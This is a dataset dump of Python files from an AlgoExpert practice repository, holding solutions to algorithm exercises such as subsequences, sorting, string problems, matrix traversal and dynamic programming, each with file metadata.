"text": "# O(n^2) time | O(n) space\ndef maxSumIncreasingSubsequence(array):\n sums = [array[i] for i in range(len(array))]\n sequences = [None for i in range(len(array))]\n if max(array) <= 0: return [max(array), [max(array)]]\n for i in range(len(array)):\n for j in range(0, i):\n if array[j] < array[i] and sums[j] + array[i] >= sums[i]:\n sums[i] = array[i] + sums[j]\n sequences[i] = j\n result = []\n id = sums.index(max(sums))\n while id is not None:\n result.append(array[id])\n id = sequences[id]\n return [max(sums), list(reversed(result))]"
},
{
"alpha_fraction": 0.5189620852470398,
"alphanum_fraction": 0.5309381484985352,
"avg_line_length": 28.52941131591797,
"blob_id": "ff282577c2e330ced91a9ede717342ffa4465a1a",
"content_id": "e4788073fcefa165f98b7c16d2a064e672cb3a11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 17,
"path": "/Sorting/SelectionSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n)-best O(n)-avarage time | O(1) space\nimport math\ndef selectionSort(array: list) -> list:\n sortedTill = 0\n for i in range(0, len(array) - 1):\n min = math.inf\n index = -1\n for j in range(sortedTill, len(array)):\n if array[j] < min:\n min = array[j]\n index = j\n swap(sortedTill, index, array)\n sortedTill += 1\n return array\n\ndef swap(i: int, j: int, array: list) -> None:\n array[i], array[j] = array[j], array[i]"
},
{
"alpha_fraction": 0.5965166687965393,
"alphanum_fraction": 0.6095790863037109,
"avg_line_length": 30.363636016845703,
"blob_id": "7ab0e39e9124e6d549f0cacdc8ca1f0da98f9933",
"content_id": "0be20561bc7f0ee4c624446bf13ebab7d29e0755",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 689,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/Strings/LongestPalindromicSubstring/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(1) space\ndef longestPalindromicSubstring(string):\n longest_palindrome = ''\n for i in range(len(string)):\n for j in range(i, len(string)):\n substring = string[i: j + 1]\n if len(substring) > len(longest_palindrome) and isPalindrome(substring):\n longest_palindrome = substring[0:]\n return longest_palindrome\n\ndef isPalindrome(string):\n if len(string) == 1: return True\n left = 0\n right = len(string) - 1\n while left < right:\n if string[left] != string[right]:\n return False\n left += 1\n right -= 1\n return True\nstring = 'abaxyzzyxf'\nprint(longestPalindromicSubstring(string))"
},
{
"alpha_fraction": 0.616216242313385,
"alphanum_fraction": 0.6405405402183533,
"avg_line_length": 25.5,
"blob_id": "e4502adad02be7b80492e7c23e9651a7a6d2f1f4",
"content_id": "db4076336c31c1f27008649561d0c72057f94044",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 370,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 14,
"path": "/ArraysCategory/MoveElementToEnd/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef swap(list, pos1, pos2):\n\tlist[pos1], list[pos2] = list[pos2], list[pos1]\n\treturn list\n\ndef moveElementToEnd(array, toMove):\n\t\n number_of_swaps = 0\n for index in range(len(array)):\n\t if array[index] != toMove and index > number_of_swaps:\n\t\t array = swap(array, number_of_swaps, index)\n\t\t number_of_swaps += 1\n\t\n return array"
},
{
"alpha_fraction": 0.5579975843429565,
"alphanum_fraction": 0.5616605877876282,
"avg_line_length": 27.275861740112305,
"blob_id": "606ab90ffa7ff89dde1befb5fb11e05949c60e35",
"content_id": "81eef28ebc8e2259ebe733fe98511a81c2c17715",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 29,
"path": "/Strings/GroupAnagrams/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(w*n*log(n)) | O(w*n) where w = number of words and n is the longest string`s length\ndef groupAnagrams(words):\n cache = {}\n result = [[] for i in range(len(words))]\n\n index = -1\n for i in range(len(words)):\n curr_word = words[i]\n letter_list = [letter for letter in curr_word]\n letter_list.sort()\n letter_list = tuple(letter_list)\n\n if letter_list not in cache:\n index += 1\n cache[letter_list] = index\n result[index].append(curr_word)\n else:\n\n result[cache[letter_list]].append(curr_word)\n\n final_result = []\n for elem in result:\n if len(elem) > 0:\n final_result.append(elem)\n return final_result\n\nwords = [\"yo\", \"act\", \"flop\", \"tac\", \"foo\", \"cat\", \"oy\", \"olfp\"]\n\nprint(groupAnagrams(words))"
},
{
"alpha_fraction": 0.58203125,
"alphanum_fraction": 0.59375,
"avg_line_length": 22.363636016845703,
"blob_id": "4fe2a1cb8e2428242f1e9ba75fdc567893ced7bf",
"content_id": "8442e02de15008b450de388f240a9ad308549746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/ArraysCategory/ValidateSubsequence/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef isValidSubsequence(array, sequence):\n seq_index = 0\n\t\n for elem in array:\n\t if seq_index == len(sequence):\n\t\t break\n\t if elem == sequence[seq_index]:\n\t\t seq_index += 1\n\t\t\t\n return seq_index == len(sequence)"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 36.5,
"blob_id": "60a908f57f8fcba2b4fd61178b484dfffe5670d5",
"content_id": "8ef5f2d8f5ff8fe81e2bdb8876073721f53edf05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# AlgoExpertExercises\nSolving every problem given by AlgoExpert in Python.\n"
},
{
"alpha_fraction": 0.3035928010940552,
"alphanum_fraction": 0.37245509028434753,
"avg_line_length": 25.95161247253418,
"blob_id": "62458a8e3381f5b20e953d97dc710696ee030b65",
"content_id": "168d78a04e716ac78c0f1062ff551f6925e38a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 62,
"path": "/ArraysCategory/ZigzagTraverse/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef zigzagTraverse(array):\n i, j = 0, 0\n number_of_elements_in_the_array = len(array) * len(array[0])\n result = []\n if number_of_elements_in_the_array != 0:\n result.append(array[i][j])\n added_elements = 1\n down = False\n up = True\n if len(array) > 1:\n i += 1\n else: j += 1\n while added_elements < number_of_elements_in_the_array:\n if up:\n if i == 0 or j == len(array[0]) - 1:\n result.append(array[i][j])\n added_elements += 1\n up = False\n down = True\n if j + 1 < len(array[0]):\n j += 1\n else: i += 1\n else:\n result.append(array[i][j])\n added_elements += 1\n i -= 1\n j += 1\n elif down:\n if j == 0 or i == len(array) - 1:\n result.append(array[i][j])\n added_elements += 1\n up = True\n down = False\n if i + 1 < len(array):\n i += 1\n else:\n j += 1\n else:\n result.append(array[i][j])\n added_elements += 1\n i += 1\n j -= 1\n return result\n\n'''arr = [ [1, 3, 4, 10, 3, 3], \n [2, 5, 9, 11, 4, 4],\n [6, 8, 12, 15, 4, 4], \n [7, 13, 14, 16, 4, 4]]'''\n\n'''arr = [\n [1, 3, 4, 10, 11],\n [2, 5, 9, 12, 20],\n [6, 8, 13, 19, 21],\n [7, 14, 18, 22, 27],\n [15, 17, 23, 26, 28],\n [16, 24, 25, 29, 30]\n ]'''\n\narr = [[1, 2, 3, 4, 5]]\n\nprint(zigzagTraverse(arr))"
},
{
"alpha_fraction": 0.5233050584793091,
"alphanum_fraction": 0.5338982939720154,
"avg_line_length": 22.649999618530273,
"blob_id": "f0af85914173422fadd1d1cebdab5c9f16d229ed",
"content_id": "49e3f97a17032f8823031d96603611bf5c28449a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 20,
"path": "/ArraysCategory/ArrayOfProducts/solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef arrayOfProducts(array):\n left = [1 for _ in range(len(array))]\n right = [1 for _ in range(len(array))]\n result = [1 for _ in range(len(array))]\n \n prod = 1\n for i in range(len(array)):\n \tleft[i] = prod\n \tprod *= array[i]\n \n prod = 1\n for i in reversed(range(len(array))):\n \tright[i] = prod\n \tprod *= array[i]\n \n for i in range(len(array)):\n \tresult[i] = left[i] * right[i]\n \n return result"
},
{
"alpha_fraction": 0.4987500011920929,
"alphanum_fraction": 0.5400000214576721,
"avg_line_length": 31.040000915527344,
"blob_id": "7434777adcd15765e47a736e2378c92217a18959",
"content_id": "77c2ed60757cdaa6b25475b006c07df9880d9b68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 25,
"path": "/DynamicProgramming/SquareOfZeros/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^4) time | O(1) space\ndef squareOfZeroes(matrix):\n for i in range(len(matrix)):\n for j in range(len(matrix)):\n for k in range(1, len(matrix)):\n if isSquare(i, i + k, j, j + k, matrix) and hasBordersZero(i, i + k, j, j + k, matrix):\n return True\n return False\n\ndef isSquare(r1, r2, c1, c2, matrix):\n return r1 < len(matrix) and r2 < len(matrix) and c1 < len(matrix) and c2 < len(matrix)\n\ndef hasBordersZero(r1, r2, c1, c2, matrix):\n for i in range(r1, r2 + 1):\n if matrix[i][c1] != 0 or matrix[i][c2] != 0:\n return False\n for i in range(c1, c2 + 1):\n if matrix[r1][i] != 0 or matrix[r2][i] != 0:\n return False\n return True\n\nmatrix = [[0, 0],\n [0, 0]]\n\nprint(squareOfZeroes(matrix))"
},
{
"alpha_fraction": 0.49299317598342896,
"alphanum_fraction": 0.5048508644104004,
"avg_line_length": 39.33333206176758,
"blob_id": "dec16aeb2df4384c9034d2409e144987a139515d",
"content_id": "76ef626de5fc40269a0cdb4785b1acd98c3a6b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2783,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 69,
"path": "/ArraysCategory/LongestPeak/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef longestPeak(array):\n if len(array) == 0: return 0\n peak_environment = []\n tmp_environment = [array[0]]\n \n inc = True\n dec = False\n first_change = False\n first_check = True\n inc_added = False\n dec_added = False\n for index in range(1, len(array)):\n if inc:\n if array[index] > tmp_environment[-1]:\n if first_check:\n first_check = False\n inc_added = True\n tmp_environment.append(array[index])\n elif array[index] < tmp_environment[-1]:\n if first_check:\n tmp_environment.clear()\n inc_added = False\n dec_added = False\n tmp_environment.append(array[index])\n continue\n tmp_environment.append(array[index])\n inc = False\n dec = True\n first_change = True\n dec_added = True\n else:\n inc = True\n dec = False\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n tmp_environment.append(array[index])\n first_check = True\n elif dec:\n if array[index] > tmp_environment[-1]:\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n if first_change:\n tmp_environment.append(array[index - 1])\n first_change = False\n dec_added = True\n tmp_environment.append(array[index])\n dec = False\n inc = True\n elif array[index] < tmp_environment[-1]:\n tmp_environment.append(array[index])\n else:\n inc = True\n dec = False\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n tmp_environment.append(array[index])\n if index == len(array) - 1:\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n if not inc_added or not dec_added: return 0\n return len(peak_environment)\n\n\narr = [1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3]\nprint(longestPeak(arr))\n"
},
{
"alpha_fraction": 0.48043185472488403,
"alphanum_fraction": 0.5249662399291992,
"avg_line_length": 26.481481552124023,
"blob_id": "943c3ef355e5b63646eef32ec25bf7e84b248a62",
"content_id": "03e8ce92de759e92e1aaed24a1cc9642335e6910",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 27,
"path": "/DynamicProgramming/LevenshteinDistance/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(min(n, m)) space\ndef levenshteinDistance(str1, str2):\n str1_array = [i for i in range(len(str1) + 1)]\n str2_array = [i for i in range(len(str2) + 1)]\n \n last_array = str2_array[0:]\n curr_array = [0 for i in range(len(str2_array))]\n i = 0\n while i < len(str1):\n curr_array[0] = str1_array[i + 1]\n for j in range(1, len(str2_array)):\n if str1[i] == str2[j - 1]:\n curr_array[j] = last_array[j - 1]\n else:\n curr_array[j] = min(min(curr_array[j - 1], last_array[j - 1]), last_array[j]) + 1\n last_array = curr_array[0:]\n i += 1\n\n return last_array[-1]\n\n \n\n\nstr1 = 'abc'\nstr2 = 'yabd'\n\nprint(levenshteinDistance(str1, str2))"
},
{
"alpha_fraction": 0.4802955687046051,
"alphanum_fraction": 0.5197044610977173,
"avg_line_length": 21.61111068725586,
"blob_id": "e4b3fc92c99eab4083bed8fbf11ed4449f91689c",
"content_id": "7e630c60d63df768955276a81b5ec31250b63ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/Greedy/TaskAssignment/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def taskAssignment(k, tasks):\n tasks.sort()\n left = 0\n right = len(tasks) - 1\n\t\n result = []\n while left < right:\n result.append([left, right])\n left += 1\n right -= 1\n\n maxx = 0\n for elem in result:\n if tasks[elem[0]] + tasks[elem[1]] > maxx:\n maxx = tasks[elem[0]] + tasks[elem[1]]\n return result\n\nprint(taskAssignment(3, [1, 3, 5, 3, 1, 4]))"
},
{
"alpha_fraction": 0.44947734475135803,
"alphanum_fraction": 0.4843205511569977,
"avg_line_length": 27.799999237060547,
"blob_id": "52b1801a2ab26e73479da14ef4c2f792acda16c3",
"content_id": "8723ff217fdbc345b1eb590e5cdf1e70b06f566e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 10,
"path": "/Recursion/NthFibonacci/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef getNthFib(n, cache={1: 0, 2: 1}):\n if n == 1: return 0\n elif n < 4: return 1\n else:\n if n in cache:\n return cache[n]\n else:\n cache[n] = getNthFib(n - 2, cache) + getNthFib(n - 1, cache)\n return cache[n]"
},
{
"alpha_fraction": 0.6235294342041016,
"alphanum_fraction": 0.6235294342041016,
"avg_line_length": 20.299999237060547,
"blob_id": "640781d8c7ba0c58c7ae9ba770b375a122022e01",
"content_id": "089a2910e13c216cbdebca1019317256e299be64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/BinaryTrees/InvertBinaryTree/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(d) where d is the depth of the tree\n\ndef invertBinaryTree(tree):\n if tree == None:\n\t return\n tmp = tree.left\n tree.left = tree.right\n tree.right = tmp\n\t\n invertBinaryTree(tree.left)\n invertBinaryTree(tree.right)\n\t\n\n\n# This is the class of the input binary tree.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None"
},
{
"alpha_fraction": 0.6253665685653687,
"alphanum_fraction": 0.6319648027420044,
"avg_line_length": 33.125,
"blob_id": "2fbbac06b6c9db2cad9a287b003fac85f47deaa9",
"content_id": "5327f13009798f4eb8170214eab4dd6f108afdb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1364,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 40,
"path": "/DynamicProgramming/LongestStringChain/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n*m^2 + nlog(n)) time | O(n) space\ndef longestStringChain(strings):\n strings.sort(key=len)\n cache = {}\n for string in strings:\n cache[string] = {'smallerString': \"\", 'chainSize': 1}\n for string in strings:\n buildLongestStringChain(string, cache)\n return getLongestChain(cache, strings)\n\n\ndef buildLongestStringChain(string, cache):\n for i in range(len(string)):\n curr_string = string[0:i] + string[i + 1:]\n if curr_string in cache:\n updateLongestStringChain(string, curr_string, cache)\n\ndef updateLongestStringChain(string, curr_string, cache):\n if cache[curr_string]['chainSize'] + 1 > cache[string]['chainSize']:\n cache[string]['smallerString'] = curr_string\n cache[string]['chainSize'] = 1 + cache[curr_string]['chainSize']\n\ndef getLongestChain(cache, strings):\n length = 0\n start_string = ''\n for string in strings:\n if cache[string]['chainSize'] > length:\n length = cache[string]['chainSize']\n start_string = string\n if length == 1: return []\n curr_string = start_string\n result = []\n while curr_string != '':\n result.append(curr_string)\n curr_string = cache[curr_string]['smallerString']\n return result\n\nstrings = [\"abde\", \"abc\", \"abd\", \"abcde\", \"ade\", \"ae\", \"1abde\", \"abcdef\"]\n\nprint(longestStringChain(strings))"
},
{
"alpha_fraction": 0.5381047129631042,
"alphanum_fraction": 0.5626242756843567,
"avg_line_length": 28.038461685180664,
"blob_id": "3a602f62a261ff026cc0e19b2cc8822c87314fa1",
"content_id": "a0c28f5bf3abd8a24c1a9daeea010e1e5da9d1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 52,
"path": "/ArraysCategory/SubarraySort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef subarraySort(array):\n if(all(array[i] <= array[i + 1] for i in range(len(array) - 1))): \n return [-1, -1]\n\n bad_start_index = -1\n bad_end_index = len(array) - 1\n for i in range(len(array) - 1):\n if array[i] > array[i + 1]:\n bad_start_index = i + 1\n break\n \n for i in range(len(array) - 1, 0, -1):\n if array[i] < array[i - 1]:\n bad_end_index = i\n break\n \n subarray = array[bad_start_index: bad_end_index + 1]\n\n lower_array = array[0:bad_start_index]\n upper_array = array[bad_end_index + 1:]\n\n print(lower_array, subarray, upper_array)\n \n if len(upper_array) != 0:\n min_from_upper = min(min(upper_array), min(subarray))\n else:\n min_from_upper = min(subarray)\n\n if len(lower_array) != 0:\n max_lower_array = max(max(lower_array), max(subarray))\n else:\n max_lower_array = max(subarray)\n\n true_starting_index_for_sort = bad_start_index\n true_ending_index_for_sort = bad_end_index\n\n for i in range(len(lower_array)):\n if lower_array[i] > min_from_upper:\n true_starting_index_for_sort = i\n break\n\n for i in range(len(upper_array)):\n if upper_array[i] < max_lower_array:\n true_ending_index_for_sort = i + len(lower_array) + len(subarray)\n\n print(true_starting_index_for_sort, true_ending_index_for_sort)\n\narr = [4, 8, 7, 12, 11, 9, -1, 3, 9, 16, -15, 11, 57]\n\n\nsubarraySort(arr)"
},
{
"alpha_fraction": 0.5358649492263794,
"alphanum_fraction": 0.5791139006614685,
"avg_line_length": 28.65625,
"blob_id": "3491d20fd6d0150311bf5c20ee57a97e4175847f",
"content_id": "c6dcbb9dad2dd41f515b77bd9bf671a500ae9bf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 32,
"path": "/DynamicProgramming/DiskStacking/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef diskStacking(disks):\n \n disks.sort(key=take_third)\n\n heights = [elem[2] for elem in disks]\n \n for i in range(len(heights)):\n for j in range(0, i):\n if is_bigger(disks[i], disks[j]):\n heights[i] = max(heights[i], disks[i][2] + heights[j])\n\n biggest_value = max(heights)\n biggest_value_index = heights.index(biggest_value)\n \n result = []\n while biggest_value > 0:\n result.append(disks[biggest_value_index])\n biggest_value = biggest_value - disks[biggest_value_index][2]\n if biggest_value != 0:\n biggest_value_index = heights.index(biggest_value)\n\n return result[::-1]\n\ndef take_third(elem):\n return elem[2]\n\ndef is_bigger(elem1, elem2):\n return elem1[0] > elem2[0] and elem1[1] > elem2[1] and elem1[2] > elem2[2]\n\ndisks = [[2, 1, 2], [3, 2, 3], [2, 2, 8], [2, 3, 4], [1, 3, 1], [4, 4, 5]]\nprint(diskStacking(disks))"
},
{
"alpha_fraction": 0.6356164216995239,
"alphanum_fraction": 0.6438356041908264,
"avg_line_length": 23.399999618530273,
"blob_id": "015d1192128a7291a1ddebe67e911ebf158de7ea",
"content_id": "ef54e04147e0728f34e5d5369e5edb3ac883652e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 15,
"path": "/BinaryTrees/NodeDepths/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# This is the class of the input binary tree.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\t\t\ndef calculateDepth(root, depth, sums) -> None:\n\tif root == None:\n\t\treturn 0\n\t\n\tsums.append(depth)\n\t\t\n\tcalculateDepth(root.left, depth + 1, sums)\n\tcalculateDepth(root.right, depth + 1, sums)"
},
{
"alpha_fraction": 0.4637436866760254,
"alphanum_fraction": 0.4890387952327728,
"avg_line_length": 32,
"blob_id": "ae62eeef79c018d1d77ac797a09c0606fcd5adb4",
"content_id": "abcc3ef6d44b876b54edec2aef9fb69733142858",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/DynamicProgramming/MinNumberOfCoinsForChange/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(n) space where m = length(denoms)\ndef minNumberOfCoinsForChange(n, denoms):\n numbers = [0 for i in range(0, n + 1)]\n denoms.sort()\n for denom in denoms:\n for i in range(0, n + 1):\n if denom == i:\n numbers[i] = 1\n elif denom < i:\n if numbers[i%denom] != 0:\n numbers[i] = min(1+ numbers[i - denom], numbers[i])\n elif i%denom == 0:\n numbers[i] = int(i/denom)\n \n return numbers[-1]\nn = 10\narr = [1, 3, 4]\nprint(minNumberOfCoinsForChange(n, arr))"
},
{
"alpha_fraction": 0.5111111402511597,
"alphanum_fraction": 0.574305534362793,
"avg_line_length": 24.280702590942383,
"blob_id": "1d860a964af9e0a63ef3380555a259bb0033f379",
"content_id": "00ede163f5cfc3f016251ee72127bd4b7b4b3fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1440,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 57,
"path": "/ArraysCategory/SpiralTraverse/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef spiralTraverse(array):\n right_steps = len(array[0])\n elements_visitted = 0\n\t\n total_number_of_elements = len(array)*len(array[0])\n output_array = []\n\t\n up_bound = 0\n right_bound = len(array[0]) - 1\n down_bound = len(array) - 1\n left_bound = 0\n\t\n current_round = 1\n\t\n while elements_visitted < total_number_of_elements:\n\t\n\t down_steps = right_steps\n\t left_steps = right_steps - 1\n\t up_steps = right_steps - 1\n\t\t\n\t for i in range(current_round - 1, right_steps):\n\t\t output_array.append(array[up_bound][i])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(current_round, down_steps):\n\t\t output_array.append(array[i][right_bound])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(left_steps - 1, current_round - 2, -1):\n\t\t output_array.append(array[down_bound][i])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(up_steps - 1, current_round - 1, -1):\n\t\t output_array.append(array[i][left_bound])\n\t\t elements_visitted += 1\n\t\t\t\n\t current_round += 1\n\t right_steps -= 1\n\t up_bound += 1\n\t right_bound -= 1\n\t down_bound -= 1\n\t left_bound += 1\n\n print(elements_visitted, total_number_of_elements)\n return output_array\n\n\narr = [\n [19, 32, 33, 34, 25, 8],\n [16, 15, 14, 13, 12, 11],\n [18, 31, 36, 35, 26, 9],\n [1, 2, 3, 4, 5, 6],\n [20, 21, 22, 23, 24, 7],\n [17, 30, 29, 28, 27, 10]\n ]\nprint(spiralTraverse(arr))"
}
] | 66 |
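As a companion to the spiralTraverse record above, the four-pointer formulation below is the common shorter way to write the same traversal; an editorial sketch, not part of the repository.

# O(n) time | O(n) space
def spiral_traverse_bounds(array):
    result = []
    top, bottom = 0, len(array) - 1
    left, right = 0, len(array[0]) - 1
    while top <= bottom and left <= right:
        for col in range(left, right + 1):
            result.append(array[top][col])
        for row in range(top + 1, bottom + 1):
            result.append(array[row][right])
        for col in reversed(range(left, right)):
            if top == bottom:  # a single remaining row was already read
                break
            result.append(array[bottom][col])
        for row in reversed(range(top + 1, bottom)):
            if left == right:  # a single remaining column was already read
                break
            result.append(array[row][left])
        top, bottom = top + 1, bottom - 1
        left, right = left + 1, right - 1
    return result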
ratzeni/presta | https://github.com/ratzeni/presta | c54abbce84e6ae500489cf667783ced1f5db81c9 | d6ec511b75c7a077245aff48301a764e262ab524 | 0bb0544f94c786257ed233827b6fe27e8968ec01 | refs/heads/master | 2020-12-26T02:11:17.194836 | 2016-10-05T10:05:29 | 2016-10-05T10:05:29 | 66,929,617 | 0 | 0 | null | 2016-08-30T10:07:50 | 2016-05-24T10:41:18 | 2016-07-25T07:44:37 | null | [
{
"alpha_fraction": 0.5312439203262329,
"alphanum_fraction": 0.532217264175415,
"avg_line_length": 40.42741775512695,
"blob_id": "dafb532aabcfbe728556ccb94fd1d6941429abf0",
"content_id": "2a88042da483f77ae7888e190dcf89a2683d5d2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10274,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 248,
"path": "/presta/delivery.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHandle the delivery of NGS data obtained from the pre-processing step\n\n inputs: datasets in fastq.gz format retrieved from a filesystem path\n destinations:\n an iRODS collection\n a different filesystem path\n a library of a Galaxy Server\n a folder of a FTP server\n\"\"\"\n\nimport os\nimport sys\n\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.vars import VariableManager\nfrom ansible.inventory import Inventory\nfrom ansible.executor.playbook_executor import PlaybookExecutor\nfrom alta.utils import ensure_dir\nfrom collections import namedtuple\nfrom client import Client\nfrom datasets import DatasetsManager\nfrom presta.app.tasks import copy\nfrom presta.utils import path_exists, get_conf\n\n\nDESTINATIONS = ['collection', 'path', 'library', 'ftp']\nSAMPLE_TYPES_TOSKIP = ['FLOWCELL', 'POOL']\n\nclass DeliveryWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n self.destination = args.destination\n self.dry_run = args.dry_run\n\n conf = get_conf(logger, args.config_file)\n self.conf = conf\n\n self.batch_id = batch_id = args.batch_id\n c = Client(conf=conf, logger=logger)\n c.init_bika()\n batch_info = c.bk.get_batch_info(batch_id)\n if batch_info:\n self.batch_info = batch_info\n else:\n logger.error('I have not found any information of the samples '\n 'owned by the batch {}'.format(batch_id))\n sys.exit()\n\n # input path must exists as parser argument or as config file argument\n if args.input_path:\n input_path = args.input_path\n else:\n io_conf = conf.get_io_section()\n input_path = io_conf.get('archive_root_path')\n path_exists(input_path, logger)\n self.input_path = input_path\n\n output_path = args.output_path if args.output_path else None\n self.output_path = output_path\n\n inventory = args.inventory if args.inventory else None\n self.inventory = inventory\n\n playbook_path = args.playbook_path if args.playbook_path else None\n self.playbook_path = playbook_path\n\n def __fs2fs_carrier(self, ipath, opath):\n bids = [_ for _ in self.batch_info.keys() if self.batch_info[_].get(\n 'type') not in SAMPLE_TYPES_TOSKIP]\n self.logger.info('Looking for files related to {} Bika ids'.format(\n len(bids)))\n self.logger.info('Starting from {}'.format(ipath))\n if len(bids) > 0:\n ensure_dir(os.path.join(opath, self.batch_id))\n\n dm = DatasetsManager(self.logger, bids)\n datasets_info, count = dm.collect_fastq_from_fs(ipath)\n self.logger.info(\"found {} files\".format(count))\n\n for bid in bids:\n if bid in datasets_info:\n for f in datasets_info[bid]:\n src = f.get('filepath')\n read = 